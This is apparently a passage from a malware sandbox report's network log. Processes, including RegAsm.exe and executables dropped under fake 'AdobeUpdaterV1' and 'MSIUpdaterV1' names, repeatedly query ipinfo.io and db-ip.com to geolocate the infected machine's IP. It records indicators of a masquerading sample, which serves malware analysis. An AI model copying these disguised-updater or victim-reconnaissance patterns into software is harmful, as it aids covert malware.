"data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:28 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49804	34.117.186.192	443	6172	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:28 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:28 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:28 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:28 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49806	34.117.186.192	443	6244	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:28 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:28 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:28 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:28 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49807	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:28 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:28 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:28 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:28 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49803	34.117.186.192	443	5568	C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:28 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:28 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:28 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:28 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49808	34.117.186.192	443	5224	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:28 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:28 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:28 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:28 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49809	34.117.186.192	443	5344	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:28 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:28 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:28 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:28 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49810	104.26.5.15	443	796	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:29 UTC	656	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC46FE44:D55C_93878F2E:0050_66387095_BD4B890:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vadKDrIf0DZaJp%2FpixygV17y95HRh9P9l17xbxyvjOi8YQSioSSUhnI4WlOq6XBaVNsHsX3AvTjD4OXzsD%2Fl6vvjM3RJ1ElhotyvPRxQjuBcGCFh%2BShn1C%2FbmA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b743d893a53f-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:29 UTC	690	IN	Data Raw: 32 61 62 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 3a Data Ascii: 2ab{"status":"ok","demoInfo":{"ipAddress":"84.17.40.101","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages":
2024-05-06 05:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49812	104.26.5.15	443	6244	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
